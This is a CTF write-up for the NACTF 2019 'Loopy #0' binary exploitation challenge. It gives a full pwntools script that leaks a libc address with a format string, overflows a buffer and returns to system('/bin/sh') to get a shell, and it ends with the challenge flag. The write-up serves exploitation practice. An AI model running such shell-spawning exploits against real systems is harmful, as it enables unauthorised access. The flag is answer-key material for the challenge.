ctftime

My solutions for various CTF challenges

View on GitHub

Loopy #0

Binary Exploitation - Points: 350

This program is quite short, but has got printf and gets in it! This shouldn’t be too hard, right?

Connect at nc shell.2019.nactf.com 31283

loopy-0.c

loopy-0

libc.so.6

The exploit uses a format string to print out the address of setvbuf from libc to be able to calculate the libc base address. It also overflows the buffer to call the function recursively again to be able to send another input.

With the libc base address we can now calculate the addresses of system and /bin/sh and overflow the buffer again to jump to it and spawn a shell.

Exploit script:

from pwn import *

libc = ELF('libc.so.6')
system = libc.symbols['system']
shell = next(libc.search('/bin/sh'))
libc_setvbuf = libc.symbols['printf']

e = ELF('loopy-0')
printf = e.got['printf']

# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-0')

payload = p32(printf) + '%4$s' + 'A' * 68 + p32(e.symbols['vuln'])

p.sendline(payload)
p.recvuntil('You typed: ')
p.recv(4)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))

libc_base = leak - libc_setvbuf

system = libc_base + system
shell = libc_base + shell

log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))

p.sendline('A'*76+p32(system)+p32(0x0)+p32(shell))
p.interactive()

flag: nactf{jus7_c411_17_4g41n_AnZPLmjm}